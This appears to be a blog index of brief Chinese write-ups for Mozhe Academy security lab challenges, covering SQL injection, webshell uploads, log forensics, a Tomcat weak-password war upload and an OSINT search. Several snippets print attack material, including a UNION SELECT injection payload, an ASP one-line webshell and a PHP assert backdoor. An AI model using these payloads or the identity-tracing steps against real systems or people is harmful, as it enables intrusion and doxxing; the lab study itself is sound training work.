墨者学院
99小飞侠9
最是难解少年梦,黄粱一转又付空
展开
-
墨者学院-热点评论刷分漏洞分析溯源
热点评论刷分漏洞分析溯源 墨者学院随便选了一个人点赞,抓包,发现id代表不同的人,ip不同可以实现重复点赞,于是发到爆破界面变换ip刷新页面,得到key...原创 2019-09-25 11:35:02 · 464 阅读 · 0 评论 -
墨者学院-WebShell文件上传漏洞分析溯源(第3题)
跟上次一样的做法,copy了一句话图片马,burpsuite拦截改后缀上传菜刀链接,清理缓存,同样的目录下找到key原创 2019-09-26 09:45:35 · 172 阅读 · 0 评论 -
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
首先进入所给的界面,发现箭头所指处有一个可疑页面通过简单的分析,这个地方存在SQL注入去网上寻找相关资料,首先使用order by 来判断有几个字段,返回内容正常,可以确定有4列。new_list.php?id=1 and 1=2 union select 1,2,3,42和3应该是有东西的,?id=1 and 1=2 union select 1,database(),versi...原创 2019-09-26 09:49:40 · 167 阅读 · 0 评论 -
墨者学院-WebShell文件上传漏洞分析溯源(第2题)
首先制作一个简单的图片木马,然后bp上传,改后缀为php用菜刀链接这个地址,找到key原创 2019-09-26 10:14:19 · 142 阅读 · 0 评论 -
墨者学院-PHP代码分析溯源(第2题)
首先,查看给的代码文件,<?php error_reporting(0); $a1 = md5('QNKCDZO'); $a = @$_POST['pass']; $a2 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $a1 == $a2) { /** 内容省略! ...原创 2019-09-26 10:20:24 · 265 阅读 · 0 评论 -
墨者学院-php分析溯源
将网站源代码下载完毕,使用d盾进行扫描,发现webshell查看里面的代码,解析md5,密码x,使用菜刀连接http://219.153.49.228:42133/shell.php?a=1Q2W3E在根目录找到key.txt,提交验证。...原创 2019-09-26 10:22:51 · 229 阅读 · 0 评论 -
墨者学院-日志文件分析溯源(Google蜘蛛)
根据题意,搜索谷歌爬虫的ip,在日志中ctrl+f尝试搜索bot 或google,结果中出现了这个验证ip得到key原创 2019-09-27 13:02:25 · 280 阅读 · 0 评论 -
墨者学院-日志文件分析溯源(SQL注入IP地址)
下载下日志来进行分析,根据题目要求搜寻sql注入的相关日志,ctrl+f来进行尝试搜索sql找到信息如下,查看该IP的后续操作,发现select等字眼,分析来看是进行过sql语句查询没错了验证ip得到key...原创 2019-09-27 13:03:55 · 322 阅读 · 0 评论 -
墨者学院-日志文件分析溯源(中断WEB业务的IP)
下载文件,用emeditor打开,根据题意,ctrl+f查找500,发现第一个出现500后有出现了post小马的操作验证ip,得到key原创 2019-09-27 13:05:19 · 209 阅读 · 0 评论 -
墨者学院-远程电子数据取证-服务器分析(第2题)
连接完毕后,找到桌面上我的电脑图标,鼠标点击右键,选择管理功能,再选择里面的事件查看器,然后筛选出用户administrator的操作 ,一共有四个,依次寻找,在其中一个里面发现有key...原创 2019-09-27 13:07:02 · 381 阅读 · 0 评论 -
墨者学院-日志文件分析溯源(连接WebShell的IP地址)
用emeditor打开,ctrl+f寻找php文件对应的ip,分析发现确实上传了木马,验证ip找到答案原创 2019-09-27 13:08:11 · 289 阅读 · 0 评论 -
墨者学院-登录密码重置漏洞分析溯源
墨者学院-登录密码重置漏洞分析溯源此题我是这么做出来的,首先用我已知的手机号进行重置密码操作,然后再开一个网页,填上嫌疑人的手机号,并发送短信,然后也给已知的手机号发送验证码再给嫌疑人的复制过去,得到key...原创 2019-09-26 09:43:25 · 733 阅读 · 0 评论 -
墨者学院-二维码文件分析
墨者学院-二维码文件分析首先用手机微信扫,什么都没扫出来,然后将二维码保存到本地,再上传然后用草料二维码在线扫描得到一串链接,将wd后面的base64进行解码,二次解码得到key解码两次得到验证码,输入验证码得到key...原创 2019-09-26 09:36:41 · 240 阅读 · 0 评论 -
墨者学院-PHP逻辑漏洞利用实战(第1题)
墨者学院-PHP逻辑漏洞利用实战(第1题)x小明要学习,所以每本书至少买一本,但是他只有一块钱,怎么办呢,只好抓包改了哈哈哈,将价格分别除以十,保证一块钱可以成功购买,放包后,显示购买成功,key也跟着出来了抓包修改得到key...原创 2019-09-26 09:33:03 · 249 阅读 · 0 评论 -
墨者学院-HTTP动作练习
墨者学院-HTTP动作练习打开这个链接报错提示返回url过长,使用burpsuite进行抓包,发现传递了很长的base64,通过POST方式提交 右键 change request method得到key...原创 2019-09-25 11:43:04 · 161 阅读 · 0 评论 -
墨者学院-浏览器信息伪造
墨者学院-浏览器信息伪造点击链接,发现无法查看,限制如下利用burpsuite抓包,并将useragent改为User-Agent:Mozilla/5.0 (iPhone; CPU iPhoneOS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365MicroMessenger/6.0 NetType...原创 2019-09-25 11:51:04 · 189 阅读 · 0 评论 -
墨者学院-内部文件上传系统漏洞分析溯源
墨者学院-内部文件上传系统漏洞分析溯源首先正常上传一个txt文件,抓包,发现是iis6.0,了解到这个版本的服务器有个解析漏洞,来加以利用于是我们更改一下upload的路径木马我们已经预先写道txt里了<%execute request(“MH”)%>菜刀链接这个地址,找到key...原创 2019-09-25 11:56:16 · 183 阅读 · 0 评论 -
墨者学院-远程电子数据取证-服务器分析(第1题)
墨者学院-远程电子数据取证-服务器分析(第1题)根据题目意思,先上网查找了recycler相关知识然后链接远程,搜索c盘recycler文件夹打开文件夹,看到key...原创 2019-09-26 08:49:18 · 241 阅读 · 0 评论 -
墨者学院-电子数据取证-日志分析(第1题)
墨者学院-电子数据取证-日志分析(第1题)打开日志文件 CTRL+f尝试搜索首先搜索了post,数据量太大,单独搜索PHP也是这样未果,搜索了uploads未果,最后通过搜索post /uploads才找到结果...原创 2019-09-26 08:52:29 · 467 阅读 · 0 评论 -
墨者学院-远程电子数据取证-木马分析(第3题)
墨者学院-远程电子数据取证-木马分析(第3题)先补充上畸形目录的相关知识,很简单,用带/x参数的dir命令即可。假定在f盘的abc文件夹下有个畸形目录g…(显示为g.文件夹),那么,在win7下打开命令行窗口,运行dir /x f:abc命令找到有g.的行,可以看到畸形文件夹的真实dos名称是GE2761,然后打开“运行”窗口,输入f:abcge2761并回车,即可打开这个畸形目录首先远程...原创 2019-09-26 09:01:16 · 456 阅读 · 0 评论 -
墨者学院-远程电子数据取证-木马分析(第1题)
墨者学院-远程电子数据取证-木马分析(第1题)根据给的账号密码登入系统通过搜索引擎中的链接,发现上传的目录为“WEB站点根目录/seo/所以我们搜索seo,看看有什么发现只能找到快捷方式,猜测隐藏了C:Inetpubwwwroot下没有seo这个文件夹,显示所有文件,发现还是没有,百度搜了下,说是驱动级文件隐藏,特征为系统目录下存在如下文件: C:WINDOWSxlkfs.datC:WI...原创 2019-09-26 09:07:48 · 495 阅读 · 0 评论 -
墨者学院-Tomcat后台弱口令漏洞利用
墨者学院-Tomcat后台弱口令漏洞利用首先在网上搜索默认tomcat账号密码进行尝试,登陆成功中找到上传点,需要上传war包于是制作一个war包木马上传并部署访问这个目录,的木马最终找到key...原创 2019-09-26 09:13:18 · 258 阅读 · 0 评论 -
墨者学院-互联网足迹探查
墨者学院-互联网足迹探查通过qq号,找到昵称为WYH023S分别在百度上搜索qq号和昵称,一无所获微博尝试搜索如下与qq头像相同,应是一人,找到他的姓名,输入得到key...原创 2019-09-26 09:25:21 · 521 阅读 · 0 评论 -
墨者学院-WEB页面分析
墨者学院-WEB页面分析首先查看源代码,看到这样一段可疑的注释,尝试后面个index.php?url=login进行访问成功拿到key原创 2019-09-26 09:28:32 · 225 阅读 · 0 评论 -
墨者学院-WebShell代码分析溯源(第10题)
hack/static/css.php进行分析,<?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST['GET']); ?>hack/static/css.php?e=assert GET菜刀链接,找到名称为key_的文件打开得...原创 2019-09-27 13:09:17 · 115 阅读 · 0 评论